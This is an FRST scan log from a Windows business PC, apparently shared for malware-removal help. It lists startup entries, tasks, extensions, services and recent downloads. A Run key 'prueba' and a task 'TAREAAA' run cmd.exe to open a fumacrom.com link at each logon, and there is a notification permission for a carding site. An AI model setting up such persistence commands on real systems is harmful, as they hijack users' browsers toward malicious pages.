(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe
(Piriform Software Ltd -> Piriform Software) C:\Program Files (x86)\CCleaner Browser\Update\1.8.1067.0\CCleanerBrowserCrashHandler.exe
(Piriform Software Ltd -> Piriform Software) C:\Program Files (x86)\CCleaner Browser\Update\1.8.1067.0\CCleanerBrowserCrashHandler64.exe
(Safer-Networking Ltd. -> Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(SAP -> SAP AG or an SAP affiliate company) C:\Program Files (x86)\Intuit\QuickBooks 2017\QBDBMgrN.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Desktop.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\tv_w32.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\tv_x64.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [HotKeysCmds] => "C:\WINDOWS\system32\hkcmd.exe" (No File)
HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET Security\ecmds.exe [167496 2021-12-10] (ESET, spol. s r.o. -> ESET)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [601928 2018-12-15] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [6787856 2019-03-19] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
HKU\S-1-5-19\...\Run: [GoogleDriveFS] => C:\Program Files\Google\Drive File Stream\54.0.2.0\GoogleDriveFS.exe [55330648 2021-12-14] (Google LLC -> Google, Inc.)
HKU\S-1-5-20\...\Run: [GoogleDriveFS] => C:\Program Files\Google\Drive File Stream\54.0.2.0\GoogleDriveFS.exe [55330648 2021-12-14] (Google LLC -> Google, Inc.)
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\Run: [GoogleDriveSync] => C:\Program Files\Google\Drive\googledrivesync.exe [49952424 2021-10-19] (Google LLC -> )
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\Run: [com.squirrel.Teams.Teams] => C:\Users\Spices\AppData\Local\Microsoft\Teams\Update.exe [1789768 2019-09-05] (Microsoft 3rd Party Application Component -> Microsoft Corporation)
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [35342976 2021-11-12] (Piriform Software Ltd -> Piriform Software Ltd)
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\Run: [CCleanerBrowserAutoLaunch_EBA6280FE373BC45FCF9CDB43D2FE029] => C:\Program Files (x86)\CCleaner Browser\Application\CCleanerBrowser.exe [2521976 2021-12-15] (Piriform Software Ltd -> Piriform Software)
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\Run: [GoogleDriveFS] => C:\Program Files\Google\Drive File Stream\54.0.2.0\GoogleDriveFS.exe [55330648 2021-12-14] (Google LLC -> Google, Inc.)
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\Run: [prueba] => C:\Windows\System32\cmd.exe /c start hxxp://fumacrom.com/2OEsQ & start chrome.exe hxxp://fumacrom.com/2OEsQ & exit
HKU\S-1-5-18\...\Run: [GoogleDriveFS] => C:\Program Files\Google\Drive File Stream\54.0.2.0\GoogleDriveFS.exe [55330648 2021-12-14] (Google LLC -> Google, Inc.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{052EB454-9F19-CB42-7875-807F79F311C4}] -> C:\Program Files (x86)\CCleaner Browser\Application\96.1.13589.113\Installer\chrmstp.exe [2021-12-16] (Piriform Software Ltd -> Piriform Software)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\96.0.4664.110\Installer\chrmstp.exe [2021-12-27] (Google LLC -> Google LLC)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Intuit Data Protect.lnk [2018-03-02]
ShortcutTarget: Intuit Data Protect.lnk -> C:\Program Files (x86)\Common Files\Intuit\DataProtect\IntuitDataProtect.exe (Intuit, Inc. -> Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk [2018-03-02]
ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit, Inc. -> Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks_Standard_21.lnk [2018-03-02]
ShortcutTarget: QuickBooks_Standard_21.lnk -> C:\Program Files (x86)\Intuit\QuickBooks 2017\QBW32.EXE (Intuit, Inc. -> Intuit Inc.)
BootExecute: autocheck autochk * sdnclean64.exe
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {039253AA-5B78-4664-AD5B-090B2EB894A7} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [22797704 2021-12-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {0C42F339-DE3B-4B39-9229-AD7686DAE33C} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee VirusScan\upgrade.exe /prepare (No File)
Task: {0DC2831A-CD47-4EDD-9E1F-7F0811FB2666} - System32\Tasks\EOSv3 Scheduler onLogOn => C:\Users\Spices\AppData\Local\ESET\ESETOnlineScanner\ESETOnlineScanner.exe [19989464 2021-12-17] (ESET, spol. s r.o. -> ESET)
Task: {108E5EEF-1416-490B-BECD-6B517DE592B4} - System32\Tasks\QBScheduledReport => C:\Program Files (x86)\Common Files\Intuit\QuickBooks\ScheduledReports\ScheduledReports.Scheduler.exe [390752 2018-05-24] (Intuit, Inc. -> )
Task: {16ABA61A-37EB-4938-AF3F-F5606E57E4B7} - System32\Tasks\HPCustParticipation HP ColorLaserJet MFP M278-M281 => C:\Program Files\HP\HP ColorLaserJet MFP M278-M281\Bin\HPCustPartic.exe [6660232 2017-07-08] (Hewlett Packard -> HP Inc.)
Task: {1C32CCF5-1FAE-4552-A8D5-E9DC003D51F5} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [684976 2021-11-12] (Piriform Software Ltd -> Piriform)
Task: {34DD9A81-9F82-460A-84A3-DF42A9D617DA} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [6332312 2021-12-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {3C9BEDBE-D3A6-446B-AAED-540A66B14AD2} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe /platui /runkey (No File)
Task: {44E31BDF-C1F8-4CB0-A4F4-DA41E40558A5} - System32\Tasks\CCleanerUpdateTaskMachineCore => C:\Program Files (x86)\CCleaner Browser\Update\CCleanerBrowserUpdate.exe [200928 2021-03-08] (Piriform Software Ltd -> Piriform Software)
Task: {460821D5-BFE3-4F2F-9758-085899A335D1} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {46402D04-2440-4BE4-BB46-66B6BD0DDD85} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [6332312 2021-12-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {485A3962-3D24-457B-837A-26851AF83E31} - System32\Tasks\GoogleUpdateTaskMachineUA1d57d83328d7164 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-03-01] (Google Inc -> Google Inc.)
Task: {4C985A3A-6B95-45DE-BAA9-7E26EE7EBE7B} - System32\Tasks\CCleaner Browser Heartbeat Task (Logon) => C:\Program Files (x86)\CCleaner Browser\Application\CCleanerBrowser.exe [2521976 2021-12-15] (Piriform Software Ltd -> Piriform Software)
Task: {6A7ECE0B-9827-486D-AF1A-39BE5A9CFC85} - System32\Tasks\CCleanerSkipUAC - Spices => C:\Program Files\CCleaner\CCleaner.exe [29417088 2021-11-12] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {6D015A8F-951B-4109-8D67-ADAEBA881EEB} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [108872 2021-12-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {7869D64A-0452-42D8-83C8-E4E5D719F034} - System32\Tasks\CCleanerUpdateTaskMachineUA => C:\Program Files (x86)\CCleaner Browser\Update\CCleanerBrowserUpdate.exe [200928 2021-03-08] (Piriform Software Ltd -> Piriform Software)
Task: {7EEFF157-BBB7-409E-96A2-38481ADE1B3E} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [22797704 2021-12-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {995E66AE-6FA4-4A54-B879-71E0781E6492} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-03-01] (Google Inc -> Google Inc.)
Task: {A559BF25-2AD5-4E2C-A24F-6C68836C60B9} - System32\Tasks\TAREAAA => C:\Windows\System32\cmd.exe /c start http://fumacrom.com/2OEsQ & start chrome.exe http://fumacrom.com/2OEsQ & exit <==== ATTENTION
Task: {B08979CE-A5ED-469E-B345-A0046CE248EA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {B0A6D467-7160-49B6-8885-6671F90ED86F} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [1171352 2021-12-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {BD3DD03D-FB9D-487D-BE28-E8B12DDA2EFE} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-03-01] (Google Inc -> Google Inc.)
Task: {CF64EA8E-7310-4C18-B459-031A11221479} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [6189624 2020-04-26] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {DA4F6040-81E8-4A20-8FCE-B89E1C5B570A} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1562376 2021-08-16] (Adobe Inc. -> Adobe Inc.)
Task: {DADBD5E7-D9CA-441A-AB7E-F6347C372C30} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [5723640 2019-09-04] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {E48C79DA-9E34-41B6-9362-07272B7F8EAA} - System32\Tasks\EOSv3 Scheduler onTime => C:\Users\Spices\AppData\Local\ESET\ESETOnlineScanner\ESETOnlineScanner.exe [19989464 2021-12-17] (ESET, spol. s r.o. -> ESET)
Task: {E4CA4FF1-C660-4FFB-8609-01654D6EC8D3} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {F1DCB98F-90BA-480A-AD7F-003C37617A59} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [108872 2021-12-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {F7F0B0D8-23B1-4ADF-B635-7C94D16F8424} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [7177168 2020-04-26] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {F89C6FF2-740E-4501-B3AE-CC3081FAE533} - System32\Tasks\CCleaner Browser Heartbeat Task (Hourly) => C:\Program Files (x86)\CCleaner Browser\Application\CCleanerBrowser.exe [2521976 2021-12-15] (Piriform Software Ltd -> Piriform Software)
Task: {FAC4AD18-8B9E-45B3-B5B3-EE58157AF3D4} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {FCE71A75-54D5-4627-8883-30E8AA858F65} - System32\Tasks\GoogleUpdateTaskMachineCore1d57d833276a9b3 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-03-01] (Google Inc -> Google Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 209.18.47.62 209.18.47.61
Tcpip\..\Interfaces\{5b9964f8-767b-4972-b670-9378d339e097}: [DhcpNameServer] 209.18.47.62 209.18.47.61

Edge: 
=======
DownloadDir: C:\Users\Spices\Downloads
Edge Notifications: HKU\S-1-5-21-1001776605-1151265979-3107129937-1001 -> hxxps://www.cvvshop.lv; hxxps://mail.google.com
Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found]
Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found]
Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found]
Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found]
Edge DefaultProfile: Default
Edge Profile: C:\Users\Spices\AppData\Local\Microsoft\Edge\User Data\Default [2022-01-06]
Edge Extension: (Malwarebytes Browser Guard) - C:\Users\Spices\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ihcjicgdanjaechkgeegckofjjedodee [2021-12-15]
Edge HKLM-x32\...\Edge\Extension: [ihcjicgdanjaechkgeegckofjjedodee]

FireFox:
========
FF DefaultProfile: 4t2gzap5.default
FF ProfilePath: C:\Users\Spices\AppData\Roaming\Mozilla\Firefox\Profiles\4t2gzap5.default [2021-12-27]
FF ProfilePath: C:\Users\Spices\AppData\Roaming\Mozilla\Firefox\Profiles\ijhul9ag.default-release [2021-12-30]
FF Plugin: @java.com/DTPlugin,version=11.201.2 -> C:\Program Files\Java\jre1.8.0_201\bin\dtplugin\npDeployJava1.dll [2020-01-30] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.201.2 -> C:\Program Files\Java\jre1.8.0_201\bin\plugin2\npjp2.dll [2020-01-30] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: Adobe Acrobat -> C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\nppdf32.dll [2021-10-05] (Adobe Inc. -> Adobe Systems Inc.)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2021-10-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2021-10-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @update.ccleanerbrowser.com/CCleaner Browser;version=3 -> C:\Program Files (x86)\CCleaner Browser\Update\1.8.1067.0\npCCleanerBrowserUpdate3.dll [2021-03-08] (Piriform Software Ltd -> Piriform Software)
FF Plugin-x32: @update.ccleanerbrowser.com/CCleaner Browser;version=9 -> C:\Program Files (x86)\CCleaner Browser\Update\1.8.1067.0\npCCleanerBrowserUpdate3.dll [2021-03-08] (Piriform Software Ltd -> Piriform Software)
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\eset_security_config_overlay.js [2021-12-27]

Chrome: 
=======
CHR Profile: C:\Users\Spices\AppData\Local\Google\Chrome\User Data\Default [2022-01-06]
CHR Extension: (Adobe Acrobat) - C:\Users\Spices\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2021-12-27]
CHR Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\Spices\AppData\Local\Google\Chrome\User Data\Default\Extensions\eofcbnmajmjmplflapaojjnihcjkigck [2021-12-27]
CHR Extension: (Malwarebytes Browser Guard) - C:\Users\Spices\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihcjicgdanjaechkgeegckofjjedodee [2021-12-27]
CHR Extension: (Application Launcher For Drive (by Google)) - C:\Users\Spices\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2021-12-27]
CHR Extension: (AVG SafePrice | Comparison, deals, coupons) - C:\Users\Spices\AppData\Local\Google\Chrome\User Data\Default\Extensions\mbckjcfnjmoiinpgddefodcighgikkgn [2021-12-27]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Spices\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-12-27]
CHR HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck]
CHR HKLM-x32\...\Chrome\Extension: [ihcjicgdanjaechkgeegckofjjedodee]
CHR HKLM-x32\...\Chrome\Extension: [mbckjcfnjmoiinpgddefodcighgikkgn]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S4 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [169728 2021-08-16] (Adobe Inc. -> Adobe Inc.)
S4 ccleaner; C:\Program Files (x86)\CCleaner Browser\Update\CCleanerBrowserUpdate.exe [200928 2021-03-08] (Piriform Software Ltd -> Piriform Software)
S4 CCleanerBrowserElevationService; C:\Program Files (x86)\CCleaner Browser\Application\96.1.13589.113\elevation_service.exe [1721904 2021-12-15] (Piriform Software Ltd -> Piriform Software)
S4 ccleanerm; C:\Program Files (x86)\CCleaner Browser\Update\CCleanerBrowserUpdate.exe [200928 2021-03-08] (Piriform Software Ltd -> Piriform Software)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [12129128 2021-12-10] (Microsoft Corporation -> Microsoft Corporation)
R2 ekrn; C:\Program Files\ESET\ESET Security\ekrn.exe [3141480 2021-12-10] (ESET, spol. s r.o. -> ESET)
R3 ekrnEpfw; C:\Program Files\ESET\ESET Security\ekrn.exe [3141480 2021-12-10] (ESET, spol. s r.o. -> ESET)
S4 HPPrintScanDoctorService; C:\Program Files\HPPrintScanDoctor\HPPrintScanDoctorService.exe [299680 2021-11-01] (HP Inc. -> HP Inc.)
S3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [7901368 2021-12-10] (Malwarebytes Inc -> Malwarebytes)
S4 QBFCService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [65536 2016-08-23] (Intuit Inc.) [File not signed]
R3 QuickBooksDB27; C:\Program Files (x86)\Intuit\QuickBooks 2017\QBDBMgrN.exe [134296 2020-02-20] (SAP -> SAP AG or an SAP affiliate company)
S4 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [2747312 2020-04-26] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
S4 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [4583240 2020-04-26] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [940976 2019-09-04] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [6138112 2021-12-15] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [12986664 2021-12-17] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\NisSrv.exe [2876152 2021-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe [128360 2021-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 AppleLowerFilter; C:\WINDOWS\System32\drivers\AppleLowerFilter.sys [35976 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [File not signed]
S3 BthHFEnum; C:\WINDOWS\System32\drivers\bthhfenum.sys [144896 2019-12-07] (Microsoft Corporation) [File not signed]
R1 eamonm; C:\WINDOWS\System32\DRIVERS\eamonm.sys [183408 2021-10-27] (ESET, spol. s r.o. -> ESET)
R0 edevmon; C:\WINDOWS\System32\DRIVERS\edevmon.sys [124496 2021-10-27] (ESET, spol. s r.o. -> ESET)
S0 eelam; C:\WINDOWS\System32\DRIVERS\eelam.sys [15824 2021-10-25] (Microsoft Windows Early Launch Anti-malware Publisher -> ESET)
R1 ehdrv; C:\WINDOWS\system32\DRIVERS\ehdrv.sys [201984 2021-10-27] (ESET, spol. s r.o. -> ESET)
R2 ekbdflt; C:\WINDOWS\system32\DRIVERS\ekbdflt.sys [43920 2021-10-27] (ESET, spol. s r.o. -> ESET)
R1 epfw; C:\WINDOWS\system32\DRIVERS\epfw.sys [69736 2021-10-27] (ESET, spol. s r.o. -> ESET)
R1 epfwwfp; C:\WINDOWS\system32\DRIVERS\epfwwfp.sys [107456 2021-10-27] (ESET, spol. s r.o. -> ESET)
R1 googledrivefs3525; C:\WINDOWS\System32\DRIVERS\googledrivefs3525.sys [389640 2021-08-09] (Google LLC -> Google, Inc.)
R1 googledrivefs3688; C:\WINDOWS\System32\DRIVERS\googledrivefs3688.sys [381456 2021-12-14] (Microsoft Windows Hardware Compatibility Publisher -> Google, Inc.)
S0 MbamElam; C:\WINDOWS\System32\DRIVERS\MbamElam.sys [19912 2021-12-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
S3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [248992 2021-12-10] (Malwarebytes Inc -> Malwarebytes)
S0 Spybot3ELAM; C:\WINDOWS\System32\drivers\Spybot3ELAM.sys [19904 2019-06-21] (Microsoft Windows Early Launch Anti-malware Publisher -> Windows (R) Win 7 DDK provider)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2021-12-07] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [435432 2021-12-07] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [86248 2021-12-07] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2022-01-06 08:10 - 2022-01-06 08:41 - 000000000 ____D C:\FRST
2022-01-06 07:58 - 2022-01-06 07:58 - 002311168 _____ (Farbar) C:\Users\Spices\Downloads\FRST64 (1).exe
2022-01-05 16:43 - 2022-01-05 16:43 - 002109918 _____ C:\Users\Spices\Downloads\CUSMA EL MONTE  DEC 27-2021-25612.pdf
2022-01-05 12:18 - 2022-01-05 12:18 - 000924333 _____ C:\Users\Spices\Downloads\12-22-21 INVOICE # 9761.pdf
2022-01-05 12:18 - 2022-01-05 12:18 - 000905087 _____ C:\Users\Spices\Downloads\12-29-21 INOVOICE# 9772.pdf
2022-01-05 12:18 - 2022-01-05 12:18 - 000743867 _____ C:\Users\Spices\Downloads\12-23-21 INVOICE# 9771.pdf
2022-01-05 11:01 - 2022-01-05 11:01 - 000000000 ____D C:\Users\Spices\Documents\QBBackupTemp Wed, Jan 05 2022 11 01 04 AM
2022-01-04 17:10 - 2022-01-04 17:10 - 000092238 _____ C:\Users\Spices\Downloads\elmo 0231351.pdf
2022-01-04 14:20 - 2022-01-04 14:20 - 000034138 _____ C:\Users\Spices\Downloads\po_lspo (28).pdf
2022-01-04 13:05 - 2022-01-04 13:05 - 000070425 _____ C:\Users\Spices\Downloads\Inv_32230_from_REHAN_SPICES_CORP_11548.pdf
2022-01-04 09:26 - 2022-01-04 09:26 - 000142812 _____ C:\Users\Spices\Downloads\179Purchase Orders (4) (1).pdf
2022-01-04 09:21 - 2022-01-04 09:21 - 000230668 _____ C:\Users\Spices\Downloads\2022--0-1--checkdownload-6070.pdf
2022-01-03 16:09 - 2022-01-03 16:09 - 000010951 _____ C:\Users\Spices\Downloads\Invoice_INV11934_1640050871611.pdf
2022-01-03 10:47 - 2022-01-03 10:47 - 000005669 _____ C:\Users\Spices\Downloads\PO538462.xlsx
2022-01-03 09:40 - 2022-01-03 09:40 - 000005668 _____ C:\Users\Spices\Downloads\PO538281.xlsx
2022-01-03 08:55 - 2022-01-03 08:55 - 000005666 _____ C:\Users\Spices\Downloads\PO538264.xlsx
2022-01-03 08:52 - 2022-01-03 08:52 - 000051446 _____ C:\Users\Spices\Downloads\ConfirmationOutgoing(Deal)MultiPDF's_222551[12-31-2021_100939_AM] .pdf
2022-01-03 07:44 - 2022-01-03 07:44 - 000003188 _____ C:\Users\Spices\Downloads\35005949.pdf
2021-12-30 10:19 - 2021-12-30 10:19 - 000259033 _____ C:\Users\Spices\Downloads\EL MONTE INV # 8397 PO# 2765.pdf
2021-12-30 09:38 - 2021-12-30 09:38 - 000000020 ___SH C:\Users\TEMP.DESKTOP-RLQ6923.005\ntuser.ini
2021-12-30 09:38 - 2021-12-30 09:38 - 000000000 ____D C:\Users\TEMP.DESKTOP-RLQ6923.005
2021-12-30 09:38 - 2021-12-22 07:51 - 000001902 _____ C:\Users\TEMP.DESKTOP-RLQ6923.005\Desktop\Google Slides.lnk
2021-12-30 09:38 - 2021-12-22 07:51 - 000001902 _____ C:\Users\TEMP.DESKTOP-RLQ6923.005\Desktop\Google Sheets.lnk
2021-12-30 09:38 - 2021-12-22 07:51 - 000001890 _____ C:\Users\TEMP.DESKTOP-RLQ6923.005\Desktop\Google Docs.lnk
2021-12-30 09:38 - 2018-03-23 02:00 - 000000000 ____D C:\Users\TEMP.DESKTOP-RLQ6923.005\AppData\Local\Google
2021-12-30 09:37 - 2021-12-30 09:45 - 000245792 _____ C:\TDSSKiller.3.1.0.28_30.12.2021_09.37.01_log.txt
2021-12-30 09:26 - 2021-12-30 09:28 - 000006288 _____ C:\TDSSKiller.3.1.0.28_30.12.2021_09.26.44_log.txt
2021-12-30 09:26 - 2021-12-30 09:26 - 005054744 _____ (AO Kaspersky Lab) C:\Users\Spices\Downloads\tdsskiller.exe
2021-12-30 08:52 - 2021-12-30 09:16 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2021-12-30 08:52 - 2021-12-30 08:52 - 000255928 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\13364584.sys
